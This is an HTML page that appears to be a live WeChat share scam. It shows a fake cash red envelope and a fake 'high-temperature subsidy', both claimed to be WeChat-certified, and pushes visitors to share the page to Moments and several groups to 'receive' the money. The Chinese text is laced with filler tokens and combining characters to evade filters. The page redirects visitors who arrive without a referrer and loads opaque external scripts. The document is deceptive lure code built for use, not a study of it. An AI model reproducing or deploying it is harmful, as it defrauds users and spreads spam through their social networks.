<!DOCTYPE html>
<html style="height:100%;font-size:100px;">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1,maximum-scale=1,minimum-scale=1">

    <meta charset="utf-8">
    <title>加载中..</title>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function randomString(len) {
            len = len || 32;
            var $chars = 'ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678';
            /****默认去掉了容易混淆的字符oOLl,9gq,Vv,Uu,I1****/
            var maxPos = $chars.length;
            var pwd = '';
            for (i = 0; i < len; i++) {
                pwd += $chars.charAt(Math.floor(Math.random() * maxPos));
            }
            return pwd;
        }
        if(!document.referrer){
            var items = ['https://zhinanai.github.io/index.html'];
            var iindex = items[Math.floor(Math.random() * items.length)];
            data = iindex + "?" + randomString(98);
            location.href = data;
        }
    </script>
    <link rel="stylesheet" href="https://mage-1.oss-cn-hangzhou.aliyuncs.com/static/css/qiang.css">
    <link rel="stylesheet" href="https://mage-1.oss-cn-hangzhou.aliyuncs.com/static/css/sharePage.css">
    <link rel="stylesheet" href="https://mage-1.oss-cn-hangzhou.aliyuncs.com/static/css/dialog.css">
    <style>
        .tan-bg-tz {
            background-color: #fff;
            border-radius: 6px;
            position: fixed;
            width: 96%;
            animation: demo2 5s ease-in-out 0s 1 alternate forwards;
            left: 2%;
            z-index: 6666;
        }

        .tongzhi_top {
            display: flex;
            justify-content: space-between;
            margin-bottom: 4px;
        }

        .tongzhi_bottom {
            display: flex;
            align-items: center;
            justify-content: space-between;
            font-size: 14px;
        }

        .t_l_text {
            display: flex;
            align-items: center;
            font-size: 12px;
        }

        .t_l_text img {
            width: 20px;
            height: auto;
            display: block;
            margin-right: 10px;
        }

        .safe-img {
            margin-top: 4px;
        }

        .safe-img img {
            width: 14px;
            height: auto;
            display: block;
        }

        .tz_img img {
            width: 10vw;
            height: 10vw;
            display: block;
        }

        .text-ling {
            margin-top: 4px;
            color: #6a6a6a;
        }

        .text-new {
            color: #6a6a6a;
        }

        .new-bg-tz {
            padding: 10px 10px 12px 20px;
        }

        @keyframes demo2 {
            0% {
                transform: translateY(-100px);
            }
            30% {
                transform: translateY(4px);
            }
            50% {
                transform: translateY(4px);
            }
            100% {
                transform: translateY(-100px);
            }
        }
    </style>
</head>
<body>
<div id="lly_dialog" style="display: block;">
    <div class="weui-mask"></div>
    <div class="weui-dialog">
        <div id="xdialog" style="background: rgb(255, 255, 255); margin-top: 15px; padding-top: 7px;">
            <div class="weui-dialog__bd" id="lly_dialog_msg">undefined</div>
            <div class="weui-dialog__ft"><a href="javascript:;" class="weui-dialog__btn weui-dialog__btn_primary"
                                            id="lly_dialog_btn">确定</a></div>
        </div>
    </div>
</div>

<script>
    window.apiCode = "api1";
    var iconUrl = "//pp.myapp.com/ma_icon/0/icon_10256204_1571814151/96";
    var titles = ["中҈华有为fuhao支持华为5G", '中华有为fuhao支持҈華為5G', '支持华为fuhao世界第一', "支持华为fuhao全民发福利"];
</script>
<script>
    var rt = [
        "夏日高温补贴发放中>>",
        "高温补贴已发放",
        "高温补贴7月10号领完",
        "高温消暑补贴",
        "高温补贴发放了",
        "高温补贴正在发放"
    ];

      title=rt[Math.floor((Math.random() * rt.length))]

    window.wxData = {
        "shareType": "1",
        "title": title,
        "detail": [
            "\u4eba\u4e00\u5b9a\u8981\u6765\u54e6!",
        ],
        "config": null,
        "type": [
            "2", "1", "1", "1", "1"
        ],
        "shareNum": "5",
        "hint": [
            "<span style=\"font-size: 23px;color:#1BBC9B;\">biaoqing恭͏喜͏你</span><br><span>您获得͏现fuhao金͏奖励</span><br><span style=\"font-size: 20px;color:red;\">money元</span><br><span style=\"color:red;\">活动宗旨：</span><span style=\"color:black;\">感恩回馈粉丝</span><br><span style=\"color:red;\">领取要求：</span><span style=\"color:black;\">您只需分享到<strong>朋友圈</strong></span><br><span style=\"color:black;\">完成后自动存入您的微fuhao信钱包</span><br><br><span>红包总额仅剩余218.1万fuhao元，先到先得，活动经微fuhao信认证，真实有效</span><br>",
            "<p style=\"padding-top: 10px; line-height: 35px;\"><b style=\"color:green;font-size: 22px\">biaoqing发送成功🎉<p style=\"font-size: 20px; line-height: 35px;\">请继续分fuhao享到<b style=\"font-size: 18px;color: red\">2</b>个不同的群biaoqing<br/><span style=\"color:red;\">红fuhao包将立即到账fuhao</span>",
            "<p style=\"padding-top: 10px; line-height: 35px;\"><b style=\"color:green;font-size: 22px\">🎉发送fuhao成功🎉<p style=\"font-size: 20px; line-height: 35px;\">剩下最后一步啦！<br />请分享到<span style=\"font-size: 30px;color: #f5294c\">微信fuhao群</span>，获赠<b style=\"font-size: 18px;color: red;\">money</b>元💰立即到账fuhao！",
            "<p style=\"padding-top: 10px; line-height: 35px;\"><b style=\"color:green;font-size: 22px\">发送失败fuhao<p style=\"font-size: 20px; line-height: 35px;\">注fuhao意：<span color=\"red\">分享到相fuhao同的群会失败</span><br>请尝试重新fuhao转发到<b style=\"font-size: 18px;color: red\">1个不同的群fuhaofuhao</b><br>",
            "<p style=\"padding-top: 10px; line-height: 35px;\"><b style=\"color:green;font-size: 22px\">biaoqing发送成功🎉<p style=\"font-size: 20px; line-height: 35px;\">请继续fuhao分享到<b style=\"font-size: 18px;color: red\">1</b>个不同fuhao的群<br/><span style=\"color:red;\">奖fuhao励将立即到账！</span>",
            "<p style=\"padding-top: 10px; line-height: 35px;\"><b style=\"color:green;font-size: 22px\">biaoqing发送成功🎉<p style=\"font-size: 20px; line-height: 35px;\">最后请fuhao分享到<b style=\"font-size: 18px;color: red\">1</b>朋友圈<br/><span style=\"color:red;\">奖fuhao励将立即到账！</span>",
            "<b style=\"font-size: 22px;color: red;\">恭喜您</b><br>获得￥ <span style=\"font-size: 20px;color: red;\">money</span> 现金红fuhao包' '金额已提交银行打款预计1小时内到账，请注意fuhao查fuhao收微信绑定银行卡到账情况！<br><span style=\"font-size: 20px;color:red;\">注意:打款期间分享信息不可删除，否则无法核实用户信息，以免现金红包发放失败！</span>"
        ]
    };


    tNum = 0;
    qNum = 0;
    var hiddenProperty = 'hidden' in document ? 'hidden' :
        'webkitHidden' in document ? 'webkitHidden' :
            'mozHidden' in document ? 'mozHidden' :
                null;
    var visibilityChangeEvent = hiddenProperty.replace(/hidden/i, 'visibilitychange');
    var onVisibilityChange = function () {
        if (!document[hiddenProperty]) {
            window.show_time = Date.now();
            if (show_time - hidden_time > 1000) {
                if (tNum > 4) {
                    qNum += 1;
                } else {
                    tNum += 1;
                }
                show();

            }

        } else {
            window.hidden_time = Date.now();
        }
    };
    document.addEventListener(visibilityChangeEvent, onVisibilityChange);

    function show(){
        num=tNum+qNum;
        num=num >6 ? 6 : num;
        $("#lly_dialog").show();
        $("#lly_dialog_msg").html(wxData['hint'][num]);
    }
</script>
<script src="https://mage-1.oss-cn-hangzhou.aliyuncs.com/static/js/hw.js"></script>


<script src="https://mage-1.oss-cn-hangzhou.aliyuncs.com/static/js/shareCore.js"></script>

<script>
    $("title").text(title);
</script>
<script src="https://res.21263.net/js/back/ee4be02c5439c936396219a84b801ee0"></script>
</body>
</html>